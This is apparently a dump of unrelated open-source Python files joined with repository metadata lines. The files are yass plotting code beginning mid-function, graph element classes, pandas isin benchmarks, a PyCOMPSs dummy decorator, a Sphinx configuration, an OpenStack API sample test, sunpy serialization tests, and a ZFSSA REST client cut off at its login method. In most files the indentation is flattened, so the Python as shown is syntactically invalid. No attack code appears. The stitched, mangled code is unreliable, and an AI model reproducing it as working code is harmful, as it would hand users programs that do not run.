fname_vis_chans = os.path.join(meta_data_dir, 'vis_chans.npy')
if not os.path.exists(fname_templates_sprase):
templates_sparse, vis_chans_all = split_templates(
templates_dir, ptp_threshold, n_updates, update_time)
#np.save(fname_templates_sprase, templates_sparse, allow_pickle=True)
#np.save(fname_vis_chans, vis_chans_all, allow_pickle=True)
else:
templates_sparse = np.load(fname_templates_sprase, allow_pickle=True)
vis_chans_all = np.load(fname_vis_chans, allow_pickle=True)
ptps_all = init_templates.ptp(1)
nearby_units = np.zeros((len(units_in), n_nearby_units), 'int32')
for ii, unit in enumerate(units_in):
nearby_units[ii] = np.argsort(
np.square(ptps_all - ptps_all[unit]).sum(1))[:n_nearby_units]
# order units in
#units_in_ordered = units_in[np.argsort(init_templates[units_in].ptp(1).max(1))[::-1]]
#units_in_ordered = units_in
run_order = np.argsort(init_templates[units_in].ptp(1).max(1))[::-1]
if fname_drifts_gt is not None:
drifts_gt = np.load(fname_drifts_gt)
else:
drifts_gt = None
for idx_ in run_order:
unit = units_in[idx_]
print(unit)
nearby_units_ = nearby_units[idx_]
for k in nearby_units_:
# save meta data
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
if not os.path.exists(fname_meta_data):
get_data(k, vis_chans_all, templates_sparse, init_templates,
spike_train, scales, shifts, reader_resid,
n_updates, update_time, meta_data_dir, cov_half)
vis_chan = vis_chans_all[unit]
templates_unit = templates_sparse[unit]
ptp_unit_init = init_templates[unit, :, vis_chan].ptp(1)
colors = ['k', 'red', 'blue', 'yellow']
# make figs
n_row = int(np.ceil(len(vis_chan)/n_col))
ptp_max_ = np.round(float(ptp_unit_init.max()), 1)
fname_out = 'ptp_{}_unit{}_clean_ptp.png'.format(int(ptp_max_), unit)
fname_out = os.path.join(figs_dir, fname_out)
if not os.path.exists(fname_out):
fig = plt.figure(figsize=(3*n_col, 3*n_row))
for jj, k in enumerate(nearby_units_):
if jj == 0:
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
temp = np.load(fname_meta_data, allow_pickle=True)
ptps_clean = temp['ptps_clean']
ptps_unit = temp['ptps_unit']
vis_chan = temp['vis_chan']
update_time = temp['update_time']
spt_sec = temp['spt_sec']
residual_variance = temp['residual_variance']
if len(spt_sec) == 0:
continue
alpha = np.min((0.05*20000/len(spt_sec), 0.5))
for ii in range(len(vis_chan)):
plt.subplot(n_row, n_col, ii+1)
plt.scatter(spt_sec, ptps_clean[:, ii], c='k', s=10, alpha=0.05)
for j in range(n_updates):
t_start = update_time*j
t_end = update_time*(j+1)
ptp_ = ptps_unit[j, ii]
plt.plot([t_start, t_end], [ptp_, ptp_], 'orange', linewidth=5)
if drifts_gt is not None:
c = vis_chan[ii]
ptp_start = init_templates[k, :, c].ptp()
ptp_end = ptp_start*drifts_gt[k, c]
plt.plot([0, reader_raw.rec_len/reader_raw.sampling_rate],
[ptp_start, ptp_end], 'b', linewidth=3)
plt.title('Channel {}'.format(vis_chan[ii]))
else:
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
temp = np.load(fname_meta_data, allow_pickle=True)
ptps_clean_k = temp['ptps_clean']
vis_chan_k = temp['vis_chan']
spt_sec_k = temp['spt_sec']
if len(spt_sec_k) == 0:
continue
alpha = np.min((0.005*20000/len(spt_sec_k), 0.5))
for ii in range(len(vis_chan)):
if np.any(vis_chan_k == vis_chan[ii]):
ii2 = np.where(vis_chan_k==vis_chan[ii])[0][0]
plt.subplot(n_row, n_col, ii+1)
plt.scatter(spt_sec_k, ptps_clean_k[:, ii2],
c=colors[jj], s=3, alpha=alpha)
f_rate_print = np.round(float(f_rates[unit]), 1)
suptitle = 'Clean PTP, Unit {}, PTP {}, {}Hz'.format(unit, ptp_max_, f_rate_print)
for jj in range(1, n_nearby_units):
ptp_print = np.round(float(ptps_all[nearby_units_[jj]].max()),1)
f_rate_print = np.round(float(f_rates[nearby_units_[jj]]), 1)
suptitle += '\n{}: '.format(colors[jj])
suptitle += ' ID {}, PTP {}, {}Hz '.format(nearby_units_[jj], ptp_print, f_rate_print)
plt.suptitle(suptitle, fontsize=20)
plt.tight_layout(rect=[0, 0.03, 1, 0.92])
plt.savefig(fname_out)
plt.close()
|
paninski-lab/yass
|
src/yass/visual/ptp_time.py
|
Python
|
apache-2.0
| 12,874
|
class Vertex(object):
def __init__(self, data, in_degree=0, out_degree=0, status='UNDISCOVERED', \
d_time=-1, f_time=-1, parent=-1, priority=65532):
self.data = data
self.in_degree = in_degree
self.out_degree = out_degree
self.status = status
self.d_time = d_time
self.f_time = f_time
self.parent = parent
self.priority = priority
@staticmethod
def init_priority():
return 65532
class Edge(object):
def __init__(self, data, weight, type='UNDETERMINED'):
self.data = data
self.weight = weight
self.type = type
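# --- Illustrative demo (not part of the original module) ---
# A minimal sketch of how these elements might back a graph: vertices in a
# list, edges keyed by (source, target) index pairs. The containers here are
# hypothetical; only Vertex and Edge come from this file.
if __name__ == '__main__':
    vertices = [Vertex('A'), Vertex('B'), Vertex('C')]
    edges = {}
    # add a weighted edge A -> B and update degree bookkeeping
    edges[(0, 1)] = Edge(data=None, weight=3)
    vertices[0].out_degree += 1
    vertices[1].in_degree += 1
    print(vertices[0].data, '->', vertices[1].data, 'weight', edges[(0, 1)].weight)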
|
haoliangyu/basic-data-structure
|
GraphElement.py
|
Python
|
mit
| 639
|
import numpy as np
from pandas import (
Categorical,
Index,
NaT,
Series,
date_range,
)
from ..pandas_vb_common import tm
class IsIn:
params = [
"int64",
"uint64",
"object",
"Int64",
"boolean",
"bool",
"datetime64[ns]",
"category[object]",
"category[int]",
"str",
"string[python]",
"string[pyarrow]",
]
param_names = ["dtype"]
def setup(self, dtype):
N = 10000
self.mismatched = [NaT.to_datetime64()] * 2
if dtype in ["boolean", "bool"]:
self.series = Series(np.random.randint(0, 2, N)).astype(dtype)
self.values = [True, False]
elif dtype == "datetime64[ns]":
# Note: values here is much larger than non-dt64ns cases
# dti has length=115777
dti = date_range(start="2015-10-26", end="2016-01-01", freq="50s")
self.series = Series(dti)
self.values = self.series._values[::3]
self.mismatched = [1, 2]
elif dtype in ["category[object]", "category[int]"]:
# Note: sizes are different in this case than others
n = 5 * 10**5
sample_size = 100
arr = list(np.random.randint(0, n // 10, size=n))
if dtype == "category[object]":
arr = [f"s{i:04d}" for i in arr]
self.values = np.random.choice(arr, sample_size)
self.series = Series(arr).astype("category")
elif dtype in ["str", "string[python]", "string[pyarrow]"]:
try:
self.series = Series(tm.makeStringIndex(N), dtype=dtype)
except ImportError:
raise NotImplementedError
self.values = list(self.series[:2])
else:
self.series = Series(np.random.randint(1, 10, N)).astype(dtype)
self.values = [1, 2]
self.cat_values = Categorical(self.values)
def time_isin(self, dtype):
self.series.isin(self.values)
def time_isin_categorical(self, dtype):
self.series.isin(self.cat_values)
def time_isin_empty(self, dtype):
self.series.isin([])
def time_isin_mismatched_dtype(self, dtype):
self.series.isin(self.mismatched)
class IsinAlmostFullWithRandomInt:
params = [
[np.float64, np.int64, np.uint64, np.object_],
range(10, 21),
["inside", "outside"],
]
param_names = ["dtype", "exponent", "title"]
def setup(self, dtype, exponent, title):
M = 3 * 2 ** (exponent - 2)
# 0.77-the maximal share of occupied buckets
self.series = Series(np.random.randint(0, M, M)).astype(dtype)
values = np.random.randint(0, M, M).astype(dtype)
if title == "inside":
self.values = values
elif title == "outside":
self.values = values + M
else:
raise ValueError(title)
def time_isin(self, dtype, exponent, title):
self.series.isin(self.values)
class IsinWithRandomFloat:
params = [
[np.float64, np.object_],
[
1_300,
2_000,
7_000,
8_000,
70_000,
80_000,
750_000,
900_000,
],
["inside", "outside"],
]
param_names = ["dtype", "size", "title"]
def setup(self, dtype, size, title):
self.values = np.random.rand(size)
self.series = Series(self.values).astype(dtype)
np.random.shuffle(self.values)
if title == "outside":
self.values = self.values + 0.1
def time_isin(self, dtype, size, title):
self.series.isin(self.values)
class IsinWithArangeSorted:
params = [
[np.float64, np.int64, np.uint64, np.object_],
[
1_000,
2_000,
8_000,
100_000,
1_000_000,
],
]
param_names = ["dtype", "size"]
def setup(self, dtype, size):
self.series = Series(np.arange(size)).astype(dtype)
self.values = np.arange(size).astype(dtype)
def time_isin(self, dtype, size):
self.series.isin(self.values)
class IsinWithArange:
params = [
[np.float64, np.int64, np.uint64, np.object_],
[
1_000,
2_000,
8_000,
],
[-2, 0, 2],
]
param_names = ["dtype", "M", "offset_factor"]
def setup(self, dtype, M, offset_factor):
offset = int(M * offset_factor)
tmp = Series(np.random.randint(offset, M + offset, 10**6))
self.series = tmp.astype(dtype)
self.values = np.arange(M).astype(dtype)
def time_isin(self, dtype, M, offset_factor):
self.series.isin(self.values)
class IsInFloat64:
params = [
[np.float64, "Float64"],
["many_different_values", "few_different_values", "only_nans_values"],
]
param_names = ["dtype", "title"]
def setup(self, dtype, title):
N_many = 10**5
N_few = 10**6
self.series = Series([1, 2], dtype=dtype)
if title == "many_different_values":
# runtime is dominated by creation of the lookup-table
self.values = np.arange(N_many, dtype=np.float64)
elif title == "few_different_values":
# runtime is dominated by creation of the lookup-table
self.values = np.zeros(N_few, dtype=np.float64)
elif title == "only_nans_values":
# runtime is dominated by creation of the lookup-table
self.values = np.full(N_few, np.nan, dtype=np.float64)
else:
raise ValueError(title)
def time_isin(self, dtype, title):
self.series.isin(self.values)
class IsInForObjects:
"""
A subset of the cartesian product of cases have special motivations:
"nans" x "nans"
if nan-objects are different objects,
this has the potential to trigger O(n^2) running time
"short" x "long"
running time dominated by the preprocessing
"long" x "short"
running time dominated by look-up
"long" x "long"
no dominating part
"long_floats" x "long_floats"
because of nans floats are special
no dominating part
"""
variants = ["nans", "short", "long", "long_floats"]
params = [variants, variants]
param_names = ["series_type", "vals_type"]
def setup(self, series_type, vals_type):
N_many = 10**5
if series_type == "nans":
ser_vals = np.full(10**4, np.nan)
elif series_type == "short":
ser_vals = np.arange(2)
elif series_type == "long":
ser_vals = np.arange(N_many)
elif series_type == "long_floats":
ser_vals = np.arange(N_many, dtype=np.float_)
self.series = Series(ser_vals).astype(object)
if vals_type == "nans":
values = np.full(10**4, np.nan)
elif vals_type == "short":
values = np.arange(2)
elif vals_type == "long":
values = np.arange(N_many)
elif vals_type == "long_floats":
values = np.arange(N_many, dtype=np.float_)
self.values = values.astype(object)
def time_isin(self, series_type, vals_type):
self.series.isin(self.values)
class IsInLongSeriesLookUpDominates:
params = [
["int64", "int32", "float64", "float32", "object", "Int64", "Float64"],
[5, 1000],
["random_hits", "random_misses", "monotone_hits", "monotone_misses"],
]
param_names = ["dtype", "MaxNumber", "series_type"]
def setup(self, dtype, MaxNumber, series_type):
N = 10**7
if series_type == "random_hits":
array = np.random.randint(0, MaxNumber, N)
if series_type == "random_misses":
array = np.random.randint(0, MaxNumber, N) + MaxNumber
if series_type == "monotone_hits":
array = np.repeat(np.arange(MaxNumber), N // MaxNumber)
if series_type == "monotone_misses":
array = np.arange(N) + MaxNumber
self.series = Series(array).astype(dtype)
self.values = np.arange(MaxNumber).astype(dtype.lower())
def time_isin(self, dtype, MaxNumber, series_type):
self.series.isin(self.values)
class IsInLongSeriesValuesDominate:
params = [
["int64", "int32", "float64", "float32", "object", "Int64", "Float64"],
["random", "monotone"],
]
param_names = ["dtype", "series_type"]
def setup(self, dtype, series_type):
N = 10**7
if series_type == "random":
vals = np.random.randint(0, 10 * N, N)
if series_type == "monotone":
vals = np.arange(N)
self.values = vals.astype(dtype.lower())
M = 10**6 + 1
self.series = Series(np.arange(M)).astype(dtype)
def time_isin(self, dtype, series_type):
self.series.isin(self.values)
class IsInWithLongTuples:
def setup(self):
t = tuple(range(1000))
self.series = Series([t] * 1000)
self.values = [t]
def time_isin(self):
self.series.isin(self.values)
class IsInIndexes:
def setup(self):
self.range_idx = Index(range(1000))
self.index = Index(list(range(1000)))
self.series = Series(np.random.randint(100_000, size=1000))
def time_isin_range_index(self):
self.series.isin(self.range_idx)
def time_isin_index(self):
self.series.isin(self.index)
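# --- Running these benchmarks (illustrative note, not part of the original) ---
# asv drives each class by instantiating it, calling ``setup`` once per
# parameter combination and then timing the ``time_*`` methods, roughly::
#
#     bench = IsIn()
#     bench.setup("int64")
#     bench.time_isin("int64")
#
# From the repository's asv_bench directory the same cases would normally be
# selected with the asv CLI, e.g. ``asv run --bench IsIn`` (the --bench flag
# filters benchmarks by regex).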
|
pandas-dev/pandas
|
asv_bench/benchmarks/algos/isin.py
|
Python
|
bsd-3-clause
| 9,544
|
#!/usr/bin/python
#
# Copyright 2002-2019 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs Dummy API - OmpSs
==========================
This file contains the dummy class OmpSs used as decorator.
"""
class OmpSs(object):
"""
Dummy OmpSs class (decorator style)
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def __call__(self, f):
def wrapped_f(*args, **kwargs):
return f(*args, **kwargs)
return wrapped_f
ompss = OmpSs
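# --- Illustrative usage (sketch only, not part of the original module) ---
# The dummy decorator accepts any arguments and simply forwards the call, so a
# decorated function behaves exactly like the undecorated one. The keyword
# below is hypothetical; it only demonstrates that arbitrary decorator
# arguments are swallowed by this stand-in.
if __name__ == "__main__":
    @ompss(binary="date")  # hypothetical parameter; ignored by the dummy
    def run_task():
        return "executed locally"
    print(run_task())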
|
mF2C/COMPSs
|
compss/programming_model/bindings/python/src/pycompss/api/dummy/ompss.py
|
Python
|
apache-2.0
| 1,125
|
# -*- coding: utf-8 -*-
#
# Freemix documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 24 11:38:38 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Freemix'
copyright = u'2010, Zepheira, LLC'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import freemix
version = '1.3.4'
# The full version, including alpha/beta/rc tags.
release = freemix.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Freemixdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Freemix.tex', u'Freemix Documentation',
u'Zepheira, LLC', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
zepheira/freemix
|
docs/conf.py
|
Python
|
apache-2.0
| 6,571
|
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
from oslo_config import cfg
from jacket.tests.compute.functional.api_sample_tests import api_sample_base
CONF = cfg.CONF
CONF.import_opt('osapi_compute_extension',
'compute.api.openstack.compute.legacy_v2.extensions')
class InstanceUsageAuditLogJsonTest(api_sample_base.ApiSampleTestBaseV21):
ADMIN_API = True
extension_name = "os-instance-usage-audit-log"
def _get_flags(self):
f = super(InstanceUsageAuditLogJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
f['osapi_compute_extension'].append('compute.api.openstack.compute.'
'contrib.instance_usage_audit_log.'
'Instance_usage_audit_log')
return f
def test_show_instance_usage_audit_log(self):
response = self._do_get('os-instance_usage_audit_log/%s' %
urllib.quote('2012-07-05 10:00:00'))
self._verify_response('inst-usage-audit-log-show-get-resp',
{}, response, 200)
def test_index_instance_usage_audit_log(self):
response = self._do_get('os-instance_usage_audit_log')
self._verify_response('inst-usage-audit-log-index-get-resp',
{}, response, 200)
|
HybridF5/jacket
|
jacket/tests/compute/functional/api_sample_tests/test_instance_usage_audit_log.py
|
Python
|
apache-2.0
| 1,937
|
import json
from astropy import units as u
from sunpy.net import vso
from sunpy.database import attrs as db_attrs
from sunpy.database.serialize import QueryEncoder, query_decode
def test_vso_wave():
attr = vso.attrs.Wave(100 * u.AA, 200 * u.AA)
expected = '{"Wave": [100.0, 200.0, "Angstrom"]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_vso_time():
attr = vso.attrs.Time((1999, 12, 31), (2000, 1, 1))
expected = '{"Time": ["1999-12-31 00:00:00", "2000-01-01 00:00:00", null]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_vso_simple_attr():
attr = vso.attrs.Instrument('EIT')
expected = '{"Instrument": "EIT"}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_starred():
expected = '{"Starred": true}'
assert json.dumps(db_attrs.Starred(), cls=QueryEncoder) == expected
def test_starred_inverted():
expected = '{"Starred": false}'
assert json.dumps(~db_attrs.Starred(), cls=QueryEncoder) == expected
def test_tag():
expected = '{"Tag": ["foo", false]}'
assert json.dumps(db_attrs.Tag('foo'), cls=QueryEncoder) == expected
def test_tag_inverted():
expected = '{"Tag": ["foo", true]}'
assert json.dumps(~db_attrs.Tag('foo'), cls=QueryEncoder) == expected
def test_path():
expected = '{"Path": ["bar", false]}'
assert json.dumps(db_attrs.Path('bar'), cls=QueryEncoder) == expected
def test_path_inverted():
expected = '{"Path": ["bar", true]}'
assert json.dumps(~db_attrs.Path('bar'), cls=QueryEncoder) == expected
def test_download_time():
attr = db_attrs.DownloadTime((1991, 8, 25, 3, 15, 40), (2001, 3, 5))
expected = (
'{"DownloadTime": '
'["1991-08-25 03:15:40", "2001-03-05 00:00:00", false]}')
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_download_time_inverted():
attr = ~db_attrs.DownloadTime((1991, 8, 25, 3, 15, 40), (2001, 3, 5))
expected = (
'{"DownloadTime": '
'["1991-08-25 03:15:40", "2001-03-05 00:00:00", true]}')
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_fits_header_entry():
attr = db_attrs.FitsHeaderEntry('key', 'value')
expected = '{"FitsHeaderEntry": ["key", "value", false]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_fits_header_entry_inverted():
attr = ~db_attrs.FitsHeaderEntry('key', 'value')
expected = '{"FitsHeaderEntry": ["key", "value", true]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_attr_or():
attr = vso.attrs.Source('SOHO') | vso.attrs.Provider('SDAC')
expected = '{"AttrOr": [{"Provider": "SDAC"}, {"Source": "SOHO"}]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_attr_and():
attr = vso.attrs.Source('SOHO') & vso.attrs.Provider('SDAC')
expected = '{"AttrAnd": [{"Provider": "SDAC"}, {"Source": "SOHO"}]}'
assert json.dumps(attr, cls=QueryEncoder) == expected
def test_decode_wave():
dump = '{"Wave": [10.0, 20.0, "Angstrom"]}'
assert json.loads(dump, object_hook=query_decode) == vso.attrs.Wave(10 * u.AA, 20 * u.AA)
def test_decode_time():
dump = '{"Time": ["1999-12-31 00:00:00", "2000-01-01 00:00:00", null]}'
expected = vso.attrs.Time((1999, 12, 31), (2000, 1, 1))
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_simple_attr():
dump = '{"Instrument": "EIT"}'
expected = vso.attrs.Instrument('EIT')
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_starred():
dump = '{"Starred": false}'
assert json.loads(dump, object_hook=query_decode) == db_attrs.Starred()
def test_decode_starred_inverted():
dump = '{"Starred": true}'
assert json.loads(dump, object_hook=query_decode) == ~db_attrs.Starred()
def test_decode_tag():
dump = '{"Tag": ["foo", false]}'
assert json.loads(dump, object_hook=query_decode) == db_attrs.Tag('foo')
def test_decode_path():
dump = '{"Path": ["bar", false]}'
assert json.loads(dump, object_hook=query_decode) == db_attrs.Path('bar')
def test_decode_download_time():
dump = (
'{"DownloadTime": '
'["1991-08-25 03:15:40", "2001-03-05 00:00:00", true]}')
expected = ~db_attrs.DownloadTime((1991, 8, 25, 3, 15, 40), (2001, 3, 5))
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_fits_header_entry():
dump = '{"FitsHeaderEntry": ["key", "value", false]}'
expected = db_attrs.FitsHeaderEntry('key', 'value')
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_or():
dump = '{"AttrOr": [{"Source": "SOHO"}, {"Provider": "SDAC"}]}'
expected = vso.attrs.Source('SOHO') | vso.attrs.Provider('SDAC')
assert json.loads(dump, object_hook=query_decode) == expected
def test_decode_and():
dump = '{"AttrAnd": [{"Source": "SOHO"}, {"Provider": "SDAC"}]}'
expected = vso.attrs.Source('SOHO') & vso.attrs.Provider('SDAC')
assert json.loads(dump, object_hook=query_decode) == expected
|
Alex-Ian-Hamilton/sunpy
|
sunpy/database/tests/test_serialize.py
|
Python
|
bsd-2-clause
| 5,068
|
# Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance REST API Client Programmatic Interface
TODO(diemtran): this module needs to be placed in a library common to OpenStack
services. When this happens, the file should be removed from Manila code
base and imported from the relevant library.
"""
import time
from oslo_serialization import jsonutils
import six
from six.moves import http_client
# pylint: disable=E0611,F0401
from six.moves.urllib import error as urlerror
from six.moves.urllib import request as urlrequest
def log_debug_msg(obj, message):
if obj.log_function:
obj.log_function(message)
class Status(object):
"""Result HTTP Status."""
#: Request return OK
OK = http_client.OK # pylint: disable=invalid-name
#: New resource created successfully
CREATED = http_client.CREATED
#: Command accepted
ACCEPTED = http_client.ACCEPTED
#: Command returned OK but no data will be returned
NO_CONTENT = http_client.NO_CONTENT
#: Bad Request
BAD_REQUEST = http_client.BAD_REQUEST
#: User is not authorized
UNAUTHORIZED = http_client.UNAUTHORIZED
#: The request is not allowed
FORBIDDEN = http_client.FORBIDDEN
#: The requested resource was not found
NOT_FOUND = http_client.NOT_FOUND
#: The request is not allowed
NOT_ALLOWED = http_client.METHOD_NOT_ALLOWED
#: Request timed out
TIMEOUT = http_client.REQUEST_TIMEOUT
#: Request conflict
CONFLICT = http_client.CONFLICT
#: Service Unavailable
BUSY = http_client.SERVICE_UNAVAILABLE
class RestResult(object):
"""Result from a REST API operation."""
def __init__(self, logfunc=None, response=None, err=None):
"""Initialize a RestResult containing the results from a REST call.
:param logfunc: debug log function.
:param response: HTTP response.
:param err: HTTP error.
"""
self.response = response
self.log_function = logfunc
self.error = err
self.data = ""
self.status = 0
if self.response:
self.status = self.response.getcode()
result = self.response.read()
while result:
self.data += result
result = self.response.read()
if self.error:
self.status = self.error.code
self.data = http_client.responses[self.status]
log_debug_msg(self, 'Response code: %s' % self.status)
log_debug_msg(self, 'Response data: %s' % self.data)
def get_header(self, name):
"""Get an HTTP header with the given name from the results.
:param name: HTTP header name.
:return: The header value or None if no value is found.
"""
if self.response is None:
return None
info = self.response.info()
return info.getheader(name)
class RestClientError(Exception):
"""Exception for ZFS REST API client errors."""
def __init__(self, status, name="ERR_INTERNAL", message=None):
"""Create a REST Response exception.
:param status: HTTP response status.
:param name: The name of the REST API error type.
:param message: Descriptive error message returned from REST call.
"""
super(RestClientError, self).__init__(message)
self.code = status
self.name = name
self.msg = message
if status in http_client.responses:
self.msg = http_client.responses[status]
def __str__(self):
return "%d %s %s" % (self.code, self.name, self.msg)
class RestClientURL(object): # pylint: disable=R0902
"""ZFSSA urllib client."""
def __init__(self, url, logfunc=None, **kwargs):
"""Initialize a REST client.
:param url: The ZFSSA REST API URL.
:key session: HTTP Cookie value of x-auth-session obtained from a
normal BUI login.
:key timeout: Time in seconds to wait for command to complete.
(Default is 60 seconds).
"""
self.url = url
self.log_function = logfunc
self.local = kwargs.get("local", False)
self.base_path = kwargs.get("base_path", "/api")
self.timeout = kwargs.get("timeout", 60)
# Initialize default headers before optionally attaching a session cookie;
# assigning into a None headers dict would raise and the session would be lost.
self.headers = {"content-type": "application/json"}
if kwargs.get('session'):
    self.headers['x-auth-session'] = kwargs.get('session')
self.do_logout = False
self.auth_str = None
def _path(self, path, base_path=None):
"""Build rest url path."""
if path.startswith("http://") or path.startswith("https://"):
return path
if base_path is None:
base_path = self.base_path
if not path.startswith(base_path) and not (
self.local and ("/api" + path).startswith(base_path)):
path = "%s%s" % (base_path, path)
if self.local and path.startswith("/api"):
path = path[4:]
return self.url + path
def _authorize(self):
"""Performs authorization setting x-auth-session."""
self.headers['authorization'] = 'Basic %s' % self.auth_str
if 'x-auth-session' in self.headers:
del self.headers['x-auth-session']
try:
result = self.post("/access/v1")
del self.headers['authorization']
if result.status == http_client.CREATED:
self.headers['x-auth-session'] = \
result.get_header('x-auth-session')
self.do_logout = True
log_debug_msg(self, ('ZFSSA version: %s')
% result.get_header('x-zfssa-version'))
elif result.status == http_client.NOT_FOUND:
raise RestClientError(result.status, name="ERR_RESTError",
message=("REST Not Available:"
"Please Upgrade"))
except RestClientError:
del self.headers['authorization']
raise
def login(self, auth_str):
"""Login to an appliance using a user name and password.
Start a session like what is done logging into the BUI. This is not a
requirement to run REST commands, since the protocol is stateless.
What it does is set up a cookie session so that some server-side
caching can be done. If login is used, remember to call logout when
finished.
:param auth_str: Authorization string (base64).
"""
self.auth_str = auth_str
self._authorize()
